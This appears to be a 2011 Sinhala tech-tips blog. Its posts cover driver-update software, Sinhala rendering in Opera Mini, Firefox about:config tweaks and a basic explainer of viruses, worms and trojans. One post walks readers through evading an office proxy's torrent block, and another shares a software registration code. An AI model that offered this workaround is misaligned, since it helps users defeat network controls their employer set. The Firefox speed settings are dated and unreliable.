මේකේ පේන්න තියෙන START SCAN කියන එක ඔබන්න. එහෙම කලාට පස්සේ ඒ සොෆ්ට්වෙයාර් ඒකෙන් පරිගණකයේ අඩුපාඩු තියෙන හැම Hardware එකක්ම පරීක්‍ෂා කරනවා. ඒක ඉවර වෙලා සම්පුර්ණ වාර්තාවක් අපිට දෙනවා. ඒකේ තියෙනවා දැනට Install කරලා තියෙන Drivers යාවත්කාලීන වෙලා නැතිනම් ඒ සම්බන්ද විස්තර, දැනටමත්  Install කරලා නැති Drivers, ඒ වගේම නියම තත්වයේ තියෙන Drivers වගේ ගොඩක් විස්තර. අපිට පුළුවන් එතනින් අපිට ඕන කරන Driver එක විතරක් Select කරගන්න. පහත රුපයේ ඒගැන පෙන්නලා තියෙනවා.

මම මෙතන Select කරගත්තේ Bluetooth Remote Control කියන එක විතරයි. ඔයාලත් ඔයාලට අවශ්‍ය ඒවා විතරක් Select කරගෙන  GET DRIVERS කියන එක ඔබන්න. බැරි වෙලාවත් ලියාපදිංචි වෙන්න ඕන කියලා කීවොත් මෙන්න මේ Code එක දෙන්න. JCCQ-MAKC-KACK-6TSE-BN35  ගොඩක් දුරට මුලින්ම යන කෙනෙකුට මේක වෙන්නේ නෑ. මම කීප සැරයක් ගිය නිසා මට එහෙම උනා. Code එක දාලා ලියාපදිංචි උනාට පස්සේ තවත් වින්ඩෝ එකක් අපිට පේනවා මෙන්න මේ වගේ.


දැන් මම පෙන්නලා තියෙන විදියට Start කරන්න. එතකොට ඔයාලට ඕන කරන Drivers ටික Download වෙන්න පටන් ගන්නවා. මෙන්න මේ විදියට.
මේ ටික ඉවර වෙලා පහත රූපයේ තියෙන විදියට Install කියන එක ක්ලික් කරන්න.
එහෙම කලාට පස්සේ සොෆ්ට්වෙයාර් එකෙන් Drivers ටික තියෙන තැන පෙන්වනවා. දැන් සාමාන්‍ය විදියට 
Drivers ටික Setup කරගන්න. ඔන්න ඔච්චරයි කරන්න තියෙන්නේ. කියන්න දෙයක් තියෙනවා. සමහර අයට මේ ක්‍රමය හරි නොයන්නත් ඉඩ තියෙනවා. එයාලට මම කියන්නම් මේ වගේම තවත් වෙබ් සයිට් එකක් ඒක තමයි. http://drivergrabber.com/  මේකෙත් මම මේ කියපු දේවල් ටිකමයි කරන්න තියෙන්නේ. හැබැයි ටිකක් වෙනස්. ඉගෙන ගන්නත් එක්ක ඒකත් කරලා බලන්න. මෙන්න මේකෙනුත් පුළුවන් http://www.drivereasy.com/ ඉතින් මේ ගැන මොනවා හරි ප්‍රශ්නයක් ඔයාලට ආවොත් දාන්න ඒ ගැන කියලා පොඩි කොමන්ටුවක් මම උදවු කරන්නම්.

මේ ගැන ඔයාලගේ අදහස් උදහස් ප්‍රශ්න ඕන එකක් Comment එකකින් දාලම යන්න.

Saturday, October 1, 2011

Mobile Phone එකෙන් සිංහල Web පිටු බලන්න

Mobile Phone එකෙන් සිංහල Web පිටු බලන්න. 
                   ගොඩක් අයට තියෙන ප්‍රශ්නයක්නේ මොබයිල් ෆෝන් එකෙන් ඉන්ටර් නෙට් යනකොට සිංහලෙන් තියෙන පිටු පෙන්නේ නැති එක. එහෙම කියලා සිංහල පිටු නොබලා ඉන්නත් බෑනේ. මේ වැඩේ ගොඩක් අය දන්නවා. ඒත් මමත් පොඩි බ්ලොග් එකකින්ම ඒක මගේ යාළුවන්ටත් කියලා දෙන්න හිතුවා. මේ වැඩේට ඔයාලගේ ෆෝන් එකේ Opera Mini කියන බ්‍රව්සර් එක තියෙන්න ඕන. ඒකෙන් තමයි මේ වැඩේ කරන්න පහසු. ඒත් ඉතින් ෆෝන් එකේ මේ බ්‍රව්සර් එක නැතිනම් මොකද කරන්නේ. කමක් නෑ මෙන්න මේ ලින්ක් එකට ගිහිල්ලා එක බාගන්න. මෙන්න ලින්ක් එක. තමන්ගේ ෆෝන් එකට ගැලපෙන එක ගන්න පුළුවන් මෙතනින්.
එහෙම අරගෙන ෆෝන් එකට ඒක දාගන්න. ඊට පස්සේ බ්‍රව්සර් එක Open කරගෙන යටින් තියෙන රුපයේ පෙන්නලා තියෙන විදියට ටයිප් කරන්න. 
opera:config කියලා ටයිප් කලානේ දැන් ෆෝන් එකේ go කියන එක ඔබලා ඉදිරියට යන්න. මේ පින්තුරයේ තියෙන විදිය එක එක ෆෝන් වලට වෙනස් වෙන්න පුළුවන්. ඒත් කරන්න තියෙන දේවල් වල වෙනසක් නෑ.  දැන් ඔයාටල පෙන්නේ මෙන්න මේ වගේ දෙයක්. 

 go කලාට පස්සේ එන මෙනු එක තමයි මේ. එකේ යටටම ගියාම තමයි ඔය ටික තියෙන්නේ.. අංක 1 න් කියල තියෙන තැන මුලින්ම තියෙන්නේ No කියලා රුපයේ විදියට එක වෙනස් කරන්න. දැන් අංක 2 ආකාරයට ඒක සේව් කරගන්න. ඊට පස්සේ බ්‍රව්සර් ඒක වහලා දාලා නැවතත් ඕපන් කරලා බලන්න. දැන් සිංහල තියෙන වෙබ් පිටුවකට ගිහින් බලන්න. ඉස්සර වෙලා කොටු කොටු පෙනුන පිටු වල දැන් සිංහල පේනවා. හැබැයි පොඩි පොඩි අඩුපාඩු ඇති. ඒත් මොනවද ලියලා තියෙන්නේ කියලා හොඳට කියවගන්න පුළුවන් තරමට පේනවා. මොකුත් නැතුවට වඩා ඒක වටිනවා. දැන් බය නැතුව සිංහල පිටු ඕන තරම් බලන්න. Facebook එකේ පිටු වලට යන්න එහෙම නියමයි නේද ? මමත් මේක අද උදේ දාගත්තේ. මගෙනම් නියමෙට වැඩ කරනවා. ඔයාලත් දාලම බලන්න. මොනවා හරි ප්‍රශ්නයක් උනොත් පොඩි කොමන්ට් එකකින්ම එකත් කියන්න. මම උදව් කරන්න ලෑස්තියි. එහෙනම් තවත් මේ වගේ ලිපියකින් හමු වෙමු.

මේ ගැන ඔයාලගේ අදහස් උදහස් ප්‍රශ්න ඕන එකක් Comment එකකින් දාලම යන්න.

Thursday, September 29, 2011

Firefox වල Browsing Speed එක වැඩි කරගන්න ඕනෙද ?

Firefox වල Browsing Speed එක වැඩි කරගන්න ඕනෙද ?
                   
                   මම අද කියලා දෙන්නේ Firefox වල බ්‍රවුස් කරන වේගය ටිකක් වැඩි කර ගන්න හොඳ ක්‍රමයක්. ලොකු වැඩක් කරන්න නෑ. පොඩි පොඩි වැඩ ටිකක් තියෙන්නේ. ඉස්සර වෙලාම ෆයර්ෆොක්ස් Open කරගන්න. ඊට පස්සේ Address Bar එකේ මෙන්න මේ විදියට ලියන්න  about:config එහෙම ලියලා Enter කරන්න. ඊට පස්සේ ඔයාලට දිග ලිස්ට් එකක් පේන්න පටන් ගන්නවා. එතන පේන්නේ ෆයර්ෆොක්ස් වල සැකසුම් ගොඩක්. අපි දැන් ඒවා ටිකක් වෙනස් කරන්න යන්නේ. මම මේ පෙන්නලා තියෙන ඒවා එතනින් හොයාගන්න ඕන.


network.http.max-connections-per-server =32
network.http.max-persistent-connections-per-proxy =16
network.http.max-connections = 64
network.http.max-persistent-connections-per-server = 10
network.http.pipelining = true
network.http.pipelining.maxrequests = 200
network.http.request.max-start-delay = 0
network.http.proxy.pipelining = true
network.http.proxy.version = 1.1



එහෙම හොයාගෙන මම පෙන්නලා තියෙන අගයන් වලට වෙනස් කරන්න ඕන. ඒක කරන්නේ අදාල පේලිය උඩ Double Click කරලා. ඔය ටික වෙනස් කරලා Firefox restart කරන්න. ඔන්න ඔච්චරයි කරන්න තියෙන්නේ. බලන්න මොනවා හරි වෙනසක් තියෙනවද කියලා. මමත් මේක කරලා බැලුවා. පොඩි වෙනසක් තියෙනවා වගේ දැනෙනවා. මේකේ තවත් ගොඩක් වෙනස්කම් කරන්න පුළුවන්. ඒත් පරිස්සමින්. එහෙම වෙනස් කරනවානම් කලින් තිබුන අගය කොහේ හරි ලියාගෙන වෙනස් කරලා බලන්න. නැතිනම් අයෙත් මුල ඉඳලා ෆයර්ෆොක්ස් දාන්න වෙයි. එච්චර අමාරුවේ වැටෙන්න ඕන නෑනේ.


            එහෙනම් මේක කියවලා අදහස් උදහස් එහම කොමන්ට් එකකින් දාලම යන්න.

Sunday, September 25, 2011

ඔෆිස් එකේ Proxy එකෙන් ටොරන්ට් Block කරලද ? මෙන්න විසඳුමක්

ඔෆිස් එකේ Proxy එකෙන් ටොරන්ට් Block කරලද ? මෙන්න විසඳුමක්

                          ගොඩක් අය කියන දෙයක් තමයි ඔෆිස් එකේ Proxy Server එකෙන් ටොරන්ට් බාගන්න දෙන්නේ නෑ බ්ලොක් කරලා. එහෙම නැතිනම් ඔෆිස් වෙලාවේ ටොරන්ට් බ්ලොක් කරලා කියන එක. ඔන්න මම දෙනවා හොඳ විසඳුමක්. මටත් මේක මගේ යාලුවෙකුගෙන් ආපු දෙයක්. මොකක් උනත් හොඳ දෙයක් නම් හැමෝටම දෙන එකනේ යුතුකම. ඔන්න ඒක නිසාම හැමෝටම ඒගැන කියලා දෙනවා. මේක මහා ලොකු වැඩකුත් නෙවෙයි. එත් බලාගන්න ඔන්න දානවා.
          ඉස්සර වෙලාම කරන්න තියෙන්නේ මෙන්න මේ කියන වෙබ් සයිට් එකේ ලියාපදිංචි වෙන එක. මෙන්න URL එක    http://www.torrific.com/signup/
ඊළඟට කරන්නේ තියෙන්නේ බාගන්න අවශ්‍ය කරන ටොරන්ට් එක තියෙන තැනට ගිහින් ටොරන්ට් එක බාගන්නේ නැතිව ටොරන්ට් ලින්ක් එක කොපි කරගන්න එක. එක කරන්නේ ටොරන්ට් එක උඩ Right Click කරලා " copy link address " කියන එක ක්ලික් කරන එක. මෙන්න මේ විදියට 
ඊට  පස්සේ මම අර ඉස්සර වෙලා කියපු වෙබ් සයිට් ඒකට ලොග් වෙන්න ඕන. දැන් එකේ ලියාපදිංචි වෙලානේ ඉන්නේ. ලොග් වෙන්න පුළුවන්නේ. මෙන්න මෙතනින්  ඒකට යන්න. http://www.torrific.com/login/?next=/
 ඊට පස්සේ යට තියෙන රූපයේ රතු පාට ඊතලයෙන්  පෙන්නලා තියෙන තැන රයිට් ක්ලික් කරලා Past  කලාම ඔයාලා කලින් කොපි කරගත්තු ටොරන්ට් ලින්ක් එක එතන පෙනෙන්න පටන් ගන්නවා. ඒක කලාට පස්සේ රතුපාට රවුමෙන් පෙන්නන තැන (Get) ක්ලික් කරන්න.


මේ ටික හරියට කරගත්තනම් අමාරුම වැඩ ටික ඉවරයි. දැන් ඔයාලට තවත් දෙයක් කරන්න තියෙනවා. යටින් පෙන්නලා තියෙන රූපය අනුව " initiate bittorrent transmission " කියන එක ක්ලික් කරන්න.

ඊළඟට මෙන්න මෙහෙම කරන්න. රුපය බලන්න 
මේකේ  කරලා තියෙන දේත් කරන්න. එහෙම කරලා අපහු Home Page එකට ගිහින් බලන්න ඔයාලගේ ටොරන්ට් එක Que එකට ගිහිල්ලද කියලා ගිහිල්ලනම් මෙන්න මෙහෙම පෙන්නවනවා 
 දැන්නම් ඉතින් ටිකක් වෙලා ඉන්න වෙනවා. සමහර විට දවසක් විතර වෙන්නත් පුළුවන්. ඒක ෆයිල් එකේ ප්‍රමාණය මත තමයි තීරණය වෙන්නේ. ෆයිල් එක සම්පුර්ණයෙන්ම අවට පස්සේ ඒකත් බලාගන්න පුළුවන්. ඔය උඩ තියෙන රුපයේ ඒකත් පේනවා. ෆයිල් එක සම්පුර්ණයෙන් ඇවිල්ලා නම් ඔය නිල් පාට අකුරු පේලිය උඩ ක්ලික් කරන්න, මෙන්න මේ විදියට පෙන්න පටන් ගනී.
දැන් ඉතින් තියෙන්නේ ඔය ෆයිල් ටික තමන්ට කැමති තැනකට බාගන්න එක තමයි. කියන්න දෙයක් තියෙනවා. මේ වෙබ් සයිට් එකෙන් අපිට කැමති තරම් ටොරන්ට් බාන්න දෙන්නේ නෑ 12 GB විතර අපේ Account එක පිරෙනකම් අපිට ගන්න පුළුවන්. ඊට වඩා ලොකු ෆයිල් බාන්න ඕනනම් සල්ලි දීල ලියාපදිංචි වෙන්න ඕන. අපිට ඉතින් 12 ක් නිකන් දෙනවනම් ඒ ඇතිනේ. මේක කරලා බලලා ප්‍රතිපල කියන්න. වැඩේ හරි යනවා. මම දැනටත් මේක කරනවා.

මේ ගැන ඔයාලගේ අදහසත් පොඩි කොමන්ට් එකකින්ම කියල යන්න.

Thursday, September 22, 2011

වයිරස් කියන්නේ මොනවද ?

මොනවාද මේ වයිරස් කියන්නේ  ?
               අද මම කියලා දෙන්නේ අපි හැමෝම බය වෙලා ඉන්න වයිරස් ගැන. ගොඩක් අය වයිරස් කීවට ඒවා මොනවද කියලා හරියට දන්නේ නෑනේ. මම කියලා දෙන්නම්. 
                 ප්‍රධාන වශයෙන් ගත්තම මේවා වර්ග කීපයක් තියෙනවා. ඒවා තමයි වයිරස් (Virus), වර්ම්ස් (Worms), ට්‍රෝජන් හෝස්(Trojan Horse). මේවා තමයි ප්‍රධාන වශයෙන්ම ක්‍රියාත්මක වන වර්ග.
 
මේහැම නමකින්ම කියවෙන දේවල් එකක්වත් අපේ පරිගණක වලට කරන හානිය එකකට එකක් වෙනස් වුවත් අඩු නැහැ. දැන් අපි මේවා එකින එක ගැන හොයලා බලමු.

Virus වයිරස්
වයිරස් කියන්නෙත් පරිගණක වලට පැමිණෙන එක්තරා ගොනු (files) විශේෂයක්. මේවාට තමන්ගේ ගතිගුණ වෙනස් කර ගැනීමේ හැකියාව තිබෙනවා. නමුත් මුල්ම අවස්ථාවේ කවුරුන් විසින් හෝ මේවා පණ ගැන්විය(Activate) යුතුයි. ඉන්පසු මේවා නිර්මාණය කල පුද්ගලයා දී ඇති උපදෙස් අනුව ක්‍රියාත්මක වීම සිදුවෙනවා. ඒ වගේම පැතිරෙන්න පටන් ගන්නවා. මෙවැනි වයිරස් වලට පරිගණකයේ ඉතිරිව ඇති සම්පුර්ණ මතකය භාවිතා කොට පරිගණකය කිසිවක් කල නොහැකි තත්වයකට ගෙන ඒමේ හැකියාව පවා තිබෙනවා. සමහර වයිරස වර්ග පරිගණකයේ ඇති අතවශ්‍ය ගොනු(File) මකා දමමින් පරිගණකය අඩපන කිරීම වැනි දේවල් කරයි. වයිරස වර්ග පරිගණකයකින් තවත් පරිගණකයකට පැතිරීමට බොහෝ ක්‍රම භාවිත කරයි. ඒවා අතර ඊමේල් ඇමුණුම් (Email Attachment), බාගත කරන ගොනු(Downloaded File), චැට් පණිවිඩ ,සංයුක්ත තැටි(CD,DVD), Flash drive ප්‍රධාන වේ.

Worm
Worms යනු වයිරස් වලට වඩා යම් තරමකින් සමාන එහෙත්  යම් යම් වෙනසකම් ඇති තවත් හානිකර ගොනු වර්ගයකි. Worms වල ඇති ප්‍රධාන වෙනස නම් ඒවා ක්‍රියාත්මක වීමට කිසිවෙකුගේ උදව්වක් අවශ්‍ය නොවීමයි.  Worms හැමවිටම තමන්ගේ කොපි තවත් පරිගණක වලට පැතිරවීම සඳහා වැඩි වශයෙන්ම පරිගණක ජාල යොදාගනී. එසේම මෙම Worms වලට තනිවම ක්‍රියා කිරීමට සහ කිසිම උදව්වක් නොමැතිව ඉක්මනින් පැතිරීමට හැකියාව ඇත. සාමාන්‍ය වයිරසයකින් කරන හානියට වඩා වැඩි හානියක් වැඩි වේගයකින් Worm එකකට කල හැක.


Trojan Horse (ට්‍රෝජන් අශ්වයා)
Trojan Horse යනු ඉහත වර්ග වල වයිරස වලට වඩා වෙනස් ආකාරයකට ක්‍රියා කරන තවත් ගොනු වර්ගයකි. මේවා සාමාන්‍යයෙන් හානිකර නොවන ප්‍රයෝජනවත් වැඩසටහනක් ආකාරයෙන් පෙනී සිටින අතර ඉතාමත් බරපතල හානි සුදුකිරීමේ හැකියාව ඇත.  උදාහරණයක්‌ ලෙස අපට ඉතාමත් ප්‍රයෝජනවත් වැඩසටහනක් ලෙස පෙනී සිට අප එම වැඩසටහන අපගේ පරිගණකයට ඇතුලත් කරගත් පසු අපට නොදැනීම පරිගණකයට හානි කිරීම අරඹයි. එසේම එම වැඩ සටහන නිපදවූ පුද්ගලයාට අපගේ අවසරය නොමැතිවම පරිගණකය තුලට පැමිණීමටද ඉඩ සලසා දෙනු ලබයි.

මෙම වයිරස වැඩ සටහන් පාදක කොට ගනිමින් විවිධ පුද්ගලයින් කරන තවත් හානිකර ක්‍රියාවන් තවත් ලිපියකින් බලාපොරොත්තු වන්න.


මේ ගැන ඔයාලගේ අදහස් උදහස් ප්‍රශ්න ඕන එකක් Comment එකකින් දාලම යන්න.